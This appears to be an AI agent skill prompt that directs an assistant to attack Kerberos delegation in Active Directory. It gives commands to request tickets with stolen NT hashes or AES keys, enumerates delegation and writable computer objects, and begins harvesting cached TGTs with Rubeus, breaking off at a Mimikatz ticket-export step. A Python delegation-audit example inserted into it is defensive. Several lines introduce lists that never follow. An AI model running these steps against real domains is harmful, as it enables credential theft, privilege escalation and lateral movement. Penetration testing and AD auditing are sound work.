Exploits Kerberos delegation misconfigurations for privilege escalation and lateral movement in Active Directory. Covers Unconstrained Delegation (TGT harvesting via coercion), Constrained Delegation (S4U2Self + S4U2Proxy with SPN swapping), and Resource-Based Constrained Delegation (RBCD via writable machine accounts).
You are helping a penetration tester exploit Kerberos delegation misconfigurations for privilege escalation and lateral movement. All testing is under explicit written authorization.
Kerberos-first authentication: All commands default to Kerberos auth via
ccache. Convert credentials to a TGT first, then use -k -no-pass (Impacket),
--use-kcache (NetExec), or /ticket: (Rubeus) throughout.
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
Print "[kerberos-delegation] Activated → <target>" to the screen on activation.
Save evidence to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).
Call get_state_summary() from the state MCP server to read current engagement state. Use it to:
Your return summary must include:
Tools: netexec/nxc, optionally Rubeus, bloodyAD, krbrelayx, SpoolSample/dementor.py/PetitPotam
Kerberos-first workflow:
getTGT.py DOMAIN/user -hashes :NTHASH
# or with AES (preferred)
getTGT.py DOMAIN/user -aesKey AES256KEY
export KRB5CCNAME=user.ccache
# All subsequent commands use -k -no-pass
Identify delegation-configured accounts. Skip if already provided by ad-discovery or conversation context.
# NetExec
nxc ldap DC.DOMAIN.LOCAL --use-kcache --trusted-for-delegation
# bloodyAD
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get search \
--filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' \
--attr sAMAccountName,userAccountControl
# PowerView (Windows)
Get-DomainComputer -Unconstrained -Properties name,dnshostname
Note: Domain Controllers always have unconstrained delegation. Focus on
non-DC computers with TRUSTED_FOR_DELEGATION.
# NetExec
nxc ldap DC.DOMAIN.LOCAL --use-kcache --delegated-to
# bloodyAD
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get search \
--filter '(msds-allowedtodelegateto=*)' \
--attr sAMAccountName,msds-allowedtodelegateto
# PowerView (Windows)
Get-DomainUser -TrustedToAuth | select name,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto
# BloodHound Cypher
MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
# bloodyAD — find computers you can write to
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get writable \
--otype COMPUTER --right WRITE --detail
# Check MachineAccountQuota (for creating attacker computer)
bloodyAD -d DOMAIN.LOCAL -k --host DC.DOMAIN.LOCAL get object \
'DC=DOMAIN,DC=LOCAL' --attr ms-DS-MachineAccountQuota
# Check existing RBCD
nxc ldap DC.DOMAIN.LOCAL --use-kcache -M rbcd
| Finding | Go To |
|---|---|
| Non-DC computer with unconstrained delegation + local admin | Step 2 |
| Service account/computer with msDS-AllowedToDelegateTo | Step 3 |
| Write access to a computer's AD object | Step 4 |
| GenericAll/WriteDACL on computer + MachineAccountQuota > 0 | Step 4 |
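The enumeration above is the same data an AD auditor reviews. The following is an added example (not part of this playbook or any of the tools it names) that classifies LDAP entries into the three delegation types using the userAccountControl bits and attributes the commands above query, and separates a domain controller's expected unconstrained setting from a non-DC finding. The entries are constructed sample data.

```python
# Added example: audit Kerberos delegation settings from LDAP attributes.
# userAccountControl bit values are the documented Microsoft constants.
TRUSTED_FOR_DELEGATION = 0x80000             # 524288: unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition ("any auth protocol")
SERVER_TRUST_ACCOUNT = 0x2000                # set on domain controller accounts
NOT_DELEGATED = 0x100000                     # "account is sensitive and cannot be delegated"


def classify_delegation(entry):
    """Return (kind, detail) for one LDAP entry dict.

    kind is 'unconstrained', 'constrained', 'rbcd' or 'none'. Only the first
    matching kind is reported; a host can carry more than one setting."""
    uac = int(entry.get("userAccountControl", 0))
    is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
    if uac & TRUSTED_FOR_DELEGATION:
        # DCs are always unconstrained; only a non-DC host is a finding.
        return ("unconstrained", "domain controller (expected)" if is_dc else "non-DC host: finding")
    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if targets:
        mode = "with protocol transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "Kerberos-only"
        return ("constrained", mode + " -> " + ", ".join(targets))
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        return ("rbcd", "inbound delegation configured")
    return ("none", "")


def audit(entries):
    """Return (sAMAccountName, kind, detail) for every entry that deserves review:
    anything delegation-enabled except a DC's expected unconstrained flag."""
    findings = []
    for e in entries:
        kind, detail = classify_delegation(e)
        if kind == "none" or detail.startswith("domain controller"):
            continue
        findings.append((e["sAMAccountName"], kind, detail))
    return findings


# Constructed sample entries (hypothetical names, not real accounts).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "userAccountControl": 532480},   # SERVER_TRUST | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "WEB01$", "userAccountControl": 528384},  # WORKSTATION_TRUST | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "svc_sql", "userAccountControl": 16777728,  # NORMAL_ACCOUNT | TRUSTED_TO_AUTH
     "msDS-AllowedToDelegateTo": ["cifs/FILE01.DOMAIN.LOCAL"]},
    {"sAMAccountName": "FILE01$", "userAccountControl": 4096,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},  # placeholder security descriptor bytes
    {"sAMAccountName": "WS01$", "userAccountControl": 4096},
]

if __name__ == "__main__":
    for name, kind, detail in audit(SAMPLE_ENTRIES):
        print(f"{name:10} {kind:13} {detail}")
```

An account flagged NOT_DELEGATED (or in Protected Users) cannot have its tickets delegated even when such a host exists, which is the usual mitigation for privileged accounts.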
Concept: When a user authenticates to an unconstrained delegation host, their TGT is cached in LSASS. With local admin on that host, extract the TGT and impersonate that user anywhere.
Requirements:
# Rubeus — monitor for new TGTs (run before coercion)
.\Rubeus.exe monitor /interval:1 /nowrap
# Mimikatz — export all cached tickets